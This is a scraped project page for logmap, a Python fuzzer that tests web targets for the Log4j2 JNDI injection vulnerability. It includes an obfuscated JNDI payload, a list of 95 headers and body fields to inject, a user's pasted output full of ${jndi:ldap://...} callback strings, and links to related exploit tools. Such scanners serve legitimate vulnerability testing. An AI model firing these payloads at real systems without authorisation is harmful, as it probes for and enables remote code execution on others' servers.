logmap: Log4j2 jndi injection fuzz tool

Last update: Oct 25, 2022

Overview

logmap - Log4j2 jndi injection fuzz tool

Used for fuzzing to test whether there are log4j2 jndi injection vulnerabilities in header/body/path
Use https://log.xn--9tr.com dnslog by default, If you want to use http://ceye.io, you need to modify the domain and token
Manually edit line #373 in logmap.py to modify:
args.ceye = ["xxxxxx.ceye.io", "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"]
to
args.ceye = ["1234567.ceye.io", "843fd6d58a8ebede756a2b991d321a5a"]

The default payload is ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//DNS_LOG_DOMAIN/a} You can customize at will, in line #283

This is just a jndi injection fuzz tool, rce or others need yourself

Use

zhzy@debian:~/$ pip3 install -r requirements.txt
zhzy@debian:~/$ python3 logmap.py -h

Options

  -u URL, --url URL     Target URL (e.g. http://example.com )
  -f FILE, --file FILE  Select a target list file (e.g. list.txt )
  -d 1, --dns 1         Dnslog [1:log.xn--9tr.com, 2:ceye.io] default 1
  -p PAYLOAD            Custom payload (e.g. ${jndi:ldap://xx.dns.xx/} )
  -t 10                 Http timeout default 10s
  --proxy PROXY         Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)
  -h, --help            Show this help message and exit

Config

There are currently 95 fuzz headers

Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Ali-CDN-Real-IP
Authorization
Cache-Control
Cdn-Real-Ip
Cdn-Src-Ip
CF-Connecting-IP
Client-IP
Contact
Cookie
DNT
Fastly-Client-Ip
Forwarded-For-Ip
Forwarded-For
Forwarded
Forwarded-Proto
From
If-Modified-Since
Max-Forwards
Originating-Ip
Origin
Pragma
Proxy-Client-IP
Proxy
Referer
TE
True-Client-Ip
True-Client-IP
Upgrade
User-Agent
Via
Warning
WL-Proxy-Client-IP
X-Api-Version
X-Att-Deviceid
X-ATT-DeviceId
X-Client-IP
X-Client-Ip
X-Client-IP
X-Cluster-Client-IP
X-Correlation-ID
X-Csrf-Token
X-CSRFToken
X-Do-Not-Track
X-Foo-Bar
X-Foo
X-Forwarded-By
X-Forwarded-For-Original
X-Forwarded-For
X-Forwarded-Host
X-Forwarded
X-Forwarded-Port
X-Forwarded-Protocol
X-Forwarded-Proto
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded-Ssl
X-Forwarder-For
X-Forward-For
X-Forward-Proto
X-Frame-Options
X-From
X-Geoip-Country
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Http-Method-Override
X-HTTP-Method-Override
X-Http-Method
X-Http-Path-Override
X-Https
X-Htx-Agent
X-Hub-Signature
X-If-Unmodified-Since
X-Imbo-Test-Config
X-Insight
X-Ip
X-Ip-Trail
X-Leakix
X-Original-URL
X-Originating-IP
X-ProxyUser-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-IP
X-Requested-With
X-Request-ID
X-True-IP
X-UIDH
X-Wap-Profile
X-WAP-Profile
X-XSRF-TOKEN

Some body and path
You can also modify him to add your own body

payload={}
user={}
pass={}
username={}
password={}
login={}
... ...
?id={}
?username={}
... ...

You might also like...

BurpSuite Extension: Log4j2 RCE Scanner

Log4j2 RCE Scanner 作者：key@元亨实验室声明：由于传播、利用本项目所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，项目作者不为此承担任何责任。小广告：实验室纳新招人，岗位方向有安全研究（攻防、漏洞）、威胁情报（APT分析）、内部安全（SDL、安全研发）

87 Dec 29, 2021

Automatic SQL injection and database takeover tool

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of

25.7k Jan 8, 2023

HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

100 Dec 23, 2022

WebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities

WebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities Which is a great tool for web pentesters. Coded in python3, CLI. WebScan is capable of scanning and detecting sql injection vulnerabilities across HTTP and HTTP sites.

12 Dec 2, 2022

Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries

Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries. Using xrefs to commonly injected and format string'd files, it will scan binaries faster than Firmware Slap.

3 Nov 16, 2021

This is an injection tool that can inject any xposed modules apk into the debug android app

This is an injection tool that can inject any xposed modules apk into the debug android app, the native code in the xposed module can also be injected.

32 Nov 5, 2022

Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

CVE-2021-22911 Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1 The getPasswordPolicy method is vulnerable to NoS

47 Nov 9, 2022

Argument Injection in Dragonfly Ruby Gem

CVE-2021-33564 PoC Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem). Usage Arbitrary File Read python3 poc.py -u https://

12 Nov 9, 2022

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection Usage usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell] CVE-2021-2

92 Jul 20, 2022

Comments

Payloads

Hi

why is the scanner still using your dnslog address? I modified as you explained logmap.py with my ceye address but seems useless. What is the problem?

[*] Fuzz body: payload=${jndi:ldap://706447ea343c33579615468af10ba6e8d52.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: user=${jndi:ldap://583e1c291b13423802c6f5a6317b9aa503.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: pass=${jndi:ldap://ce3cb7fa12349b10c7f04184664f2e4d30.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: username=${jndi:ldap://8ba8434e6e6a7a9c439ee295813d4274f1.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: password=${jndi:ldap://a34b6342a8f9f904ef123d4acd41ef84fb.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: login=${jndi:ldap://19a6f69d3431007656895d5b9a5cea1a88c.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: email=${jndi:ldap://1496093343816930cac1eae4872b36d28b3.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: principal=${jndi:ldap://59c7343e3427d4c5c780c77d3af8b40a046.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: token=${jndi:ldap://b779933434f686fe0a858454db4c9876cb45.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: verify=${jndi:ldap://1e95d93432a63eaf88a42d4de219d00b1a7.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: dest=${jndi:ldap://0b4db253437ca23d7eeb792f34a95bad937.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: login_password=${jndi:ldap://80f221856555e7f9d7502f4cd89f42838c6.649a1815.dns.1433.eu.org.:443/dvYBvm} [*] Fuzz body: login_username=${jndi:ldap://533019256e8c9ea5ffa5015893e5d04bb4.649a1815.dns.1433.eu.org.:443/dvYBvm}

opened by Teicu 2
Change SocksiPy_branch to PySocks and bypass cert verification for logger

With SocksiPy_branch lib --proxy function does not work: attributeerror: module 'socks' has no attribute 'set_default_proxy'

Instead, PySocks (more known lib) can be used and it fixes the problem.

This change required me to add verify=False to remaining 2 GETs to log.xn--9tr.com that didn't have this argument yet. Seems like PySocks is more demanding when it comes to SSL.

opened by linoskoczek 1

Owner

之乎者也

天苍苍，野茫茫，风吹的我就像头羊~ @0-sec && @pwnwiki-project && @xiecat

GitHub https://github.com/zhzyker/logmap

MongoDB-Injection - This challenge-script is custom-made for web-server running MongoDB which is vulnerable to No-SQL injection

MongoDB-Injection Cheesy Multi-threaded script for NoSQL Injection This challeng

2 Jun 6, 2022

Fuzz introspector is a tool to help fuzzer developers to get an understanding of their fuzzer’s performance and identify any potential blockers.

Fuzz introspector Fuzz introspector is a tool to help fuzzer developers to get an understanding of their fuzzer’s performance and identify any potenti

Open Source Security Foundation (OpenSSF)

221 Jan 1, 2023

logmap: Log4j2 jndi injection fuzz tool

Related tags

Overview

logmap - Log4j2 jndi injection fuzz tool

Use

Options

Config

You might also like...

BurpSuite Extension: Log4j2 RCE Scanner

Automatic SQL injection and database takeover tool

HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

WebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities

Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries

This is an injection tool that can inject any xposed modules apk into the debug android app

Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

Argument Injection in Dragonfly Ruby Gem

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

Comments

Payloads

Change SocksiPy_branch to PySocks and bypass cert verification for logger

Owner

之乎者也

MongoDB-Injection - This challenge-script is custom-made for web-server running MongoDB which is vulnerable to No-SQL injection

Fuzz introspector is a tool to help fuzzer developers to get an understanding of their fuzzer’s performance and identify any potential blockers.

log4j2 passive burp rce scanning tool get post cookie full parameter recognition

This is the fuzzer I made to fuzz Preview on macOS and iOS like 8years back when I just started fuzzing things.

Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

Log4j2 CVE-2021-44228 revshell

Log4j vuln fuzz/scan with python

Scan all java processes on your host to check weather it's affected by log4j2 remote code execution

log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

Log4j2 intranet scan